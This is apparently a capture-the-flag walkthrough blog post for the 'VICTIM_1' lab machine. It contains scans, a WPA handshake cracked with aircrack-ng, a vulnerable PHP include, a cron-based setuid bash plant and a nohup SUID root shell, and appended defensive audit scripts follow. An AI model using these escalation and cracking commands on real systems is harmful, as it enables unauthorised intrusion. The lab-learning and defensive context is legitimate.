VICTIM_1 Target Machine


Information Gathering

┌──(kali㉿kali)-[~/Downloads/VICTIM_1]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.120
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 07:48 EDT
Nmap scan report for 192.168.56.120
Host is up (0.00036s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
8999/tcp open bctp
9000/tcp open cslistener
MAC Address: 08:00:27:CE:FC:4B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds

Ports 22, 80, 8080, 8999 and 9000 are open.

┌──(kali㉿kali)-[~/Downloads/VICTIM_1]
└─$ sudo nmap -sT -sV -sC -O -p22,80,8080,8999,9000 192.168.56.120
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 07:49 EDT
Nmap scan report for 192.168.56.120
Host is up (0.00033s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ea:e8:15:7d:8a:74:bc:45:09:76:34:13:2c:d8:1e:62 (RSA)
| 256 51:75:37:23:b6:0f:7d:ed:61:a0:61:18:21:89:35:5d (ECDSA)
|_ 256 7d:36:08:ba:91:ef:24:9f:7b:24:f6:64:c7:53:2c:b0 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open http BusyBox httpd 1.13
|_http-title: 404 Not Found
8999/tcp open http WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: 0.0.0.0:8999/
9000/tcp open http PHP cli server 5.5 or later (PHP 7.2.30-1)
|_http-title: Uncaught Exception: MissingDatabaseExtensionException
MAC Address: 08:00:27:CE:FC:4B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (93%), Synology DiskStation Manager 5.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 4.15 - 5.8 (93%), Linux 5.0 - 5.4 (93%), Linux 5.0 - 5.5 (90%), Linux 2.6.32 (87%), Linux 3.10 - 4.11 (87%), Linux 3.2 - 4.9 (87%), Linux 3.4 - 3.10 (87%), Synology DiskStation Manager 5.2-5644 (87%), Linux 2.6.32 - 3.10 (86%), Linux 2.6.32 - 3.13 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.68 seconds

Ubuntu operating system; port 80 returns 403 Forbidden, port 8080 returns 404 Not Found, port 8999 runs WebFS, and port 9000 is the PHP CLI server.

┌──(kali㉿kali)-[~/Downloads/VICTIM_1]
└─$ sudo nmap --script=vuln -p22,80,8080,8999,9000 192.168.56.120
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 08:01 EDT
Nmap scan report for 192.168.56.120
Host is up (0.00033s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
8080/tcp open http-proxy
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
8999/tcp open bctp
9000/tcp open cslistener
MAC Address: 08:00:27:CE:FC:4B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 94.78 seconds

The vulnerability script scan turned up nothing useful. Let's look at each port's page in turn.

Looking at the Web Services

Port 80 shows: No configuration file found and no installation code available. Exiting...

Port 8080 shows a 404.

Port 8999 lists some files; it looks like a WordPress install, but there is no wp-config.php.

Port 9000 reports that the database connection is missing a driver.

No leads at this point, so I first browsed roughly through the folders and files on port 8999 and found nothing exploitable, though there is a WPA-01.cap file; after downloading and opening it, it turned out to be a packet capture.

I didn't know what to do with it and saw no sensitive information in it, so next let's brute-force directories and see whether any sensitive files or directories turn up.

Directory Brute-forcing

Start with port 80. Most results are 403, so they are not all listed.

┌──(kali㉿kali)-[~/Downloads/VICTIM_1]
└─$ sudo dirsearch -u http://192.168.56.120

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.120/_23-06-27_08-04-12.txt

Error Log: /root/.dirsearch/logs/errors-23-06-27_08-04-12.log

Target: http://192.168.56.120/

[08:04:16] 200 - 18KB - /LICENSE.txt
[08:04:16] 200 - 5KB - /README.txt
[08:04:21] 301 - 324B - /administrator -> http://192.168.56.120/administrator/
[08:04:21] 200 - 31B - /administrator/cache/
[08:04:21] 200 - 74B - /administrator/index.php
[08:04:21] 200 - 31B - /administrator/logs/
[08:04:23] 200 - 31B - /bin/
[08:04:23] 200 - 31B - /cache/
[08:04:24] 200 - 31B - /cli/
[08:04:24] 200 - 31B - /components/
[08:04:28] 200 - 0B - /file.php
[08:04:29] 200 - 3KB - /htaccess.txt
[08:04:29] 200 - 31B - /images/
[08:04:30] 200 - 31B - /includes/
[08:04:30] 200 - 74B - /index.php
[08:04:30] 200 - 74B - /index.php/login/
[08:04:31] 200 - 31B - /layouts/
[08:04:31] 200 - 31B - /libraries/
[08:04:33] 200 - 31B - /media/
[08:04:33] 200 - 31B - /modules/
[08:04:36] 200 - 31B - /plugins/
[08:04:38] 200 - 33B - /robots.txt
[08:04:38] 200 - 829B - /robots.txt.dist
[08:04:41] 301 - 320B - /templates -> http://192.168.56.120/templates/
[08:04:41] 200 - 31B - /templates/index.html
[08:04:41] 200 - 31B - /templates/
[08:04:41] 200 - 0B - /templates/beez3/
[08:04:41] 200 - 0B - /templates/system/
[08:04:41] 200 - 0B - /templates/protostar/
[08:04:42] 200 - 31B - /tmp/

The 31B entries all return an empty page and the 0B ones return no content at all. htaccess.txt and README.txt show that this was originally a Joomla CMS. robots.txt contains a taunt, Disallow: h@ck3rz!, and I tried it: it really is not a directory. robots.txt.dist is Joomla's default disallow list. Nothing gained from port 80 so far; scan port 8080 next.

┌──(kali㉿kali)-[~/Downloads/VICTIM_1]
└─$ sudo dirsearch -u http://192.168.56.120:8080

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.120-8080/_23-06-27_08-17-47.txt

Error Log: /root/.dirsearch/logs/errors-23-06-27_08-17-47.log

Target: http://192.168.56.120:8080/

[08:17:47] Starting:
[08:17:48] 200 - 0B - /.bash_history
[08:17:48] 200 - 220B - /.bash_logout
[08:17:48] 200 - 4KB - /.bashrc
[08:17:49] 302 - 0B - /.local -> /.local/
[08:17:49] 200 - 807B - /.profile
[08:17:50] 200 - 66B - /.selected_editor
[08:17:50] 200 - 765B - /.viminfo
[08:18:01] 403 - 93B - /cgi-bin/
[08:18:05] 200 - 63B - /file.php
[08:18:07] 403 - 93B - /httpd.conf
[08:18:12] 200 - 23B - /passwords.txt
Task Completed

This time it looked more promising, but on opening them the .viminfo file only records an edit of /etc/sysconfig/network, and visiting file.php downloads it directly:

<?php
$file = $_GET['file'];
include('directory/' . $file);
?>

This looks like it may be a file inclusion vulnerability. passwords.txt is another taunt:

Hahahaha...Try Harder!

That covers the information available on port 8080; let's look at port 9000.

┌──(kali㉿kali)-[~/Downloads/VICTIM_1]
└─$ sudo dirsearch -u http://192.168.56.120:9000/
[sudo] password for kali:

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.120-9000/-_23-06-27_08-32-26.txt

Error Log: /root/.dirsearch/logs/errors-23-06-27_08-32-26.log

Target: http://192.168.56.120:9000/

[08:32:26] Starting:
[08:33:39] 200 - 4B - /files/
[08:33:39] 200 - 4B - /files
[08:33:39] 200 - 4B - /files/tmp/
[08:33:39] 200 - 4B - /files/cache/
[08:33:47] 200 - 0B - /index.php
[08:35:25] 200 - 195B - /files/.htaccess
[08:35:25] 200 - 195B - /files/.htaccess/

The files directory contains only a single "no", and the .htaccess file holds nothing of interest either.

The most promising foothold now seems to be the file inclusion suggested by the contents of file.php, so I tried building a file-inclusion exploit on each port.

But 403 ... I'm nearly out of options.
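The file.php snippet above does include('directory/' . $file) with no check at all, so a value such as ../../etc/passwd walks straight out of directory/. The fix is to resolve the requested name and confirm that the result still lies inside the intended base directory; PHP's realpath() gives the same containment test. The following is an added example, not code from the original write-up or the target machine: a POSIX shell version of that check so the cases can be exercised without a web server. The function name and the constructed files are assumptions.

```shell
#!/bin/sh
# Added example: the containment check that file.php lacks.

# safe_include_path BASE NAME
# Prints the resolved path and returns 0 when NAME is a plain file name that
# resolves to a regular file inside BASE; returns 1 and prints nothing otherwise.
safe_include_path() {
    base=$(realpath -- "$1") || return 1
    case "$2" in
        ''|*/*|.*) return 1 ;;          # empty, contains a slash, or starts with "."
    esac
    target=$(realpath -m -- "$base/$2") || return 1   # -m: resolve even if missing
    case "$target" in
        "$base"/*) ;;                   # still inside BASE after symlink resolution
        *) return 1 ;;
    esac
    [ -f "$target" ] || return 1
    printf '%s\n' "$target"
}

# Constructed demonstration tree: directory/page.txt is legitimate,
# directory/link.txt is a symlink escaping to a file outside the base.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/directory"
    printf 'public content\n' > "$tmp/directory/page.txt"
    printf 'secret\n' > "$tmp/secret.txt"
    ln -s "$tmp/secret.txt" "$tmp/directory/link.txt"
    for name in page.txt ../secret.txt link.txt .htaccess sub/page.txt; do
        if p=$(safe_include_path "$tmp/directory" "$name"); then
            echo "allow  $name -> $p"
        else
            echo "reject $name"
        fi
    done
    rm -rf "$tmp"
}
demo
```

Only page.txt is allowed; the traversal, the escaping symlink, the dotfile and the nested path are all rejected, because the check is on the resolved path rather than on the string the client supplied.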

Cracking with aircrack-ng

There is still the WPA-01.cap file that I haven't known what to do with, so let's search for it. Searching for "cap penetration" at first yielded nothing valuable; adding the "wpa" from the file name to the search turned up useful results.

Open the first link. We only want to process the cap file, so search the page for .cap:

-b <bssid> : target selection: access point's MAC

The -b parameter specifies the access point's MAC; here we first try running without it.

┌──(kali㉿kali)-[~/Downloads]
└─$ aircrack-ng -w /usr/share/wordlists/rockyou.txt WPA-01.cap
Reading packets, please wait...
Opening WPA-01.cap
Resetting EAPOL Handshake decoder state.
Read 1918 packets.

# BSSID ESSID Encryption

1 5C:D9:98:5A:B6:62 dlink WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening WPA-01.cap
Resetting EAPOL Handshake decoder state.
Read 1918 packets.

1 potential targets


Aircrack-ng 1.7

[00:00:14] 70447/14344392 keys tested (4872.59 k/s)

Time left: 48 minutes, 49 seconds 0.49%

KEY FOUND! [ p4ssword ]


Master Key : 8F C0 1B 1B 85 06 0B 85 23 7C 83 74 F8 4B 4A FD
50 CE EC 72 6F 85 17 5F B1 14 5E D2 F2 47 5D 1A

Transient Key : 13 41 36 81 4A 92 19 CF EC 14 B8 FD 20 2C D4 2E
BA A1 95 79 CE 15 5F 1A 2C DE 03 A8 2B 52 68 64
D3 77 A7 E4 FF CD 49 0C ED E9 5E 3B 68 E6 83 26
06 0C 98 8D 43 B6 7C E4 FE ED 2E 45 90 0D 6D 15

EAPOL HMAC : 33 A5 CE E2 46 DB 4B 96 86 A1 6E D9 D2 A2 A6 E9

Getshell

Found the password p4ssword, but there's a problem: I don't know the username... I dug through the site for a long time again and still didn't find it, and finally looked at the walkthrough: it turns out dlink is the username.

┌──(kali㉿kali)-[~/Downloads]
└─$ ssh dlink@192.168.56.120
The authenticity of host '192.168.56.120 (192.168.56.120)' can't be established.
ED25519 key fingerprint is SHA256:ePua4qlxyyVdR3vIDdxTLN/vcsunu7mAZICrDcLW8m0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.120' (ED25519) to the list of known hosts.
dlink@192.168.56.120's password:
Last login: Tue Apr 7 23:36:49 2020 from 192.168.86.99
dlink@victim01:~$ whoami
dlink
dlink@victim01:~$ ls -liah
total 20K
152513 drwxr-xr-x 2 dlink dlink 4.0K Apr 22 2020 .
131074 drwxr-xr-x 4 root root 4.0K Apr 7 2020 ..
153736 lrwxrwxrwx 1 dlink dlink 9 Apr 7 2020 .bash_history -> /dev/null
153733 -rw-r--r-- 1 dlink dlink 220 Apr 7 2020 .bash_logout
152516 -rw-r--r-- 1 dlink dlink 3.7K Apr 7 2020 .bashrc
153734 -rw-r--r-- 1 dlink dlink 807 Apr 7 2020 .profile
dlink@victim01:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:ce:fc:4b brd ff:ff:ff:ff:ff:ff
inet 192.168.56.120/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 528sec preferred_lft 528sec
inet6 fe80::a00:27ff:fece:fc4b/64 scope link
valid_lft forever preferred_lft forever
dlink@victim01:~$ uname -a
Linux victim01 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
dlink@victim01:~$ sudo -l
User dlink may run the following commands on localhost:
(ALL) NOPASSWD: /usr/bin/TryHarder!
dlink@victim01:~$ ls -liah /usr/bin/TryHarder!
ls: cannot access '/usr/bin/TryHarder!': No such file or directory

Played again by the sudo -l result. Looking at the permissions on the bin directory, we can't write a file of the same name into it.

Privilege Escalation

Cron Jobs

Let's look at something else: what about cron jobs?

dlink@victim01:/usr/bin$ cat /etc/crontab
* * * * * /tmp/script.sh

It calls an sh file; the tmp directory is empty and writable by us, so let's write a script.sh into it.

dlink@victim01:/tmp$ echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash" > script.sh

Waited a long time and it never ran... After searching, I suspect it may be a problem of the script lacking environment variables: Linux scheduled task not executing (hyfstyle's blog on CSDN)
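From the defender's side, the crontab line above is the kind of entry a periodic audit should catch: the job points at a script in a world-writable directory, the script does not exist yet (so whoever can write /tmp can create it), and, since the system crontab format carries a user name between the schedule and the command, the line as shown has no user field at all. The following is an added example, not part of the original write-up or the target machine: a small shell audit of a system crontab that flags those conditions plus a target that exists but is not executable. The function names and the constructed sample crontab are assumptions.

```shell
#!/bin/sh
# Added example: audit a system crontab for job targets an attacker could control.

# is_world_writable PATH: true when "others" have write permission on PATH
is_world_writable() {
    [ -n "$(find "$1" -prune -perm -0002 2>/dev/null)" ]
}

# audit_crontab FILE: prints one "WARN: ..." line per finding
audit_crontab() {
    # system crontab layout: m h dom mon dow user command...
    while read -r m h dom mon dow f6 rest || [ -n "$m" ]; do
        case "$m" in
            ''|'#'*|@*) continue ;;     # blank, comment, or @reboot-style line (not handled here)
            [A-Za-z_]*) continue ;;     # NAME=value environment line
        esac
        case "$f6" in
            /*) # the user column is missing; cron would read this path as a user name
                printf '%s\n' "WARN: no user field: $m $h $dom $mon $dow $f6 $rest"
                cmd=$f6 ;;
            *)  cmd=${rest%% *} ;;
        esac
        case "$cmd" in /*) ;; *) continue ;; esac   # only absolute command paths are checked
        dir=$(dirname "$cmd")
        if [ ! -e "$cmd" ]; then
            printf '%s\n' "WARN: target does not exist (a writable parent lets anyone create it): $cmd"
        elif [ ! -x "$cmd" ]; then
            printf '%s\n' "WARN: target is not executable: $cmd"
        fi
        if is_world_writable "$dir"; then
            printf '%s\n' "WARN: target lives in a world-writable directory: $dir"
        fi
    done < "$1"
}

# count_findings FILE: number of WARN lines audit_crontab produces for FILE
count_findings() {
    audit_crontab "$1" | grep -c '^WARN' || true
}

# make_sample_crontab: builds a constructed crontab plus the files it refers to
# in a temporary directory and prints the crontab's path
make_sample_crontab() {
    base=$(mktemp -d)
    mkdir -p "$base/bin" "$base/droptmp"
    chmod 755 "$base/bin"
    chmod 1777 "$base/droptmp"                                  # stands in for /tmp
    printf '#!/bin/sh\necho backup\n' > "$base/bin/backup.sh"
    chmod 755 "$base/bin/backup.sh"
    printf '#!/bin/sh\necho noexec\n' > "$base/bin/noexec.sh"   # deliberately left 0644
    cat > "$base/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
0 3 * * * root $base/bin/backup.sh
30 4 * * * root $base/bin/noexec.sh
* * * * * $base/droptmp/script.sh
EOF
    echo "$base/crontab"
}

f=$(make_sample_crontab)
audit_crontab "$f"
echo "findings: $(count_findings "$f")"   # 4 for the constructed sample
rm -rf "$(dirname "$f")"
```

Run it against /etc/crontab and the files under /etc/cron.d on a real host; a job target under /tmp, /var/tmp or /dev/shm, or one that does not exist yet, is the signal worth alerting on.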

An Open Question

Let's look at setuid permissions.

dlink@victim01:/tmp$ find / -type f -perm -04000 -ls 2>/dev/null
11165 376 -rwsr-xr-- 1 root dip 382696 Feb 11 2020 /usr/sbin/pppd
676 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
1173 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
2278 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
1172 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
469 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
2226 148 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
950 36 -rwsr-xr-x 1 root root 35000 Jan 18 2018 /usr/bin/nohup
2279 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
2471 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
690 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
2282 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
2281 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
10977 24 -rwsr-xr-x 1 root root 22528 Jun 28 2019 /usr/bin/arping
11027 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
6886 44 -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
702 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
7602 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
1316 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
512 108 -rwsr-sr-x 1 root root 109432 Oct 30 2019 /usr/lib/snapd/snap-confine
393274 44 -rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
393281 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
393282 28 -rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
393601 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
393285 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount

First try escalating via the helper.

dlink@victim01:/tmp$ systemd-run -t bash
Failed to start transient service unit: Interactive authentication required.

nohup SUID Privilege Escalation

Using GTFOBins

dlink@victim01:/tmp$ /usr/bin/nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
/usr/bin/nohup: ignoring input and appending output to 'nohup.out'
# whoami
root
# id
uid=1002(dlink) gid=1004(dlink) euid=0(root) groups=1004(dlink)
# cd /root
# ls
flag.txt snap
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:ce:fc:4b brd ff:ff:ff:ff:ff:ff
inet 192.168.56.120/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 599sec preferred_lft 599sec
inet6 fe80::a00:27ff:fece:fc4b/64 scope link
valid_lft forever preferred_lft forever
# uname -a
Linux victim01 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
# cat flag.txt
Nice work!

.:##:::.
.:::::/;;\:.
()::::::@::/;;#;|:.
::::##::::|;;##;|::
':::::::::\;;;/::'
':::::::::::
|O|O|O|O|O|O
:#:::::::##::.
.:###:::::#:::::.
:::##:::::::::::#:.
::::;:::::::::###::.
':::;::###::;::#:::::
::::;::#::;::::::::::
:##:;::::::;::::###::: .
.:::::; .:::##::::::::::::::::
::::::; :::::::::::::::::##:: #rootdance
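The root shell above came from a setuid copy of nohup, a program that is not normally setuid; everything else in the find listing is a standard setuid binary. That is exactly the case a baseline comparison catches: record the setuid files of a known-good system once, then list the setuid files on the host being checked and report anything new. The following is an added example, not part of the original write-up or the target machine: the list-and-compare in shell, demonstrated on a constructed directory tree. The function names, the tree and the baseline list are assumptions.

```shell
#!/bin/sh
# Added example: find setuid files under a root and diff them against a baseline.

# list_suid ROOT: prints absolute paths of setuid regular files under ROOT, sorted
list_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | LC_ALL=C sort
}

# unexpected_suid ROOT BASELINE_FILE: prints setuid files under ROOT (relative
# to ROOT, one per line) that are absent from BASELINE_FILE; comment lines in
# the baseline are ignored
unexpected_suid() {
    root=$1
    baseline=$2
    cur=$(mktemp)
    ref=$(mktemp)
    list_suid "$root" | sed "s|^$root||" | LC_ALL=C sort > "$cur"
    grep -v '^#' "$baseline" | LC_ALL=C sort > "$ref"
    comm -23 "$cur" "$ref"          # lines only in the current list
    rm -f "$cur" "$ref"
}

# make_demo_tree: constructed tree with four setuid files and one ordinary
# binary, plus a baseline that knows about three of the setuid files;
# prints the tree's root
make_demo_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/bin"
    for f in usr/bin/passwd usr/bin/sudo bin/su usr/bin/nohup; do
        printf '#!/bin/sh\n' > "$root/$f"
        chmod 4755 "$root/$f"       # setuid bit, shown by ls as -rwsr-xr-x
    done
    printf '#!/bin/sh\n' > "$root/bin/ls"
    chmod 755 "$root/bin/ls"        # ordinary binary, must not be listed
    printf '%s\n' '# setuid files recorded on the known-good reference host' \
        /usr/bin/passwd /usr/bin/sudo /bin/su > "$root/baseline.txt"
    echo "$root"
}

r=$(make_demo_tree)
echo "setuid files under $r:"
list_suid "$r"
echo "not in baseline:"
unexpected_suid "$r" "$r/baseline.txt"    # prints /usr/bin/nohup
rm -rf "$r"
```

On a real host the baseline is the output of list_suid / taken at build time, with the prefix already empty; any path that later shows up in unexpected_suid is either a package update or a planted binary, and either way worth a ticket.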

VICTIM_1 Target Machine
https://i3eg1nner.github.io/2023/06/10ac18445f7e.html
Author: I3eg1nner
Published: June 27, 2023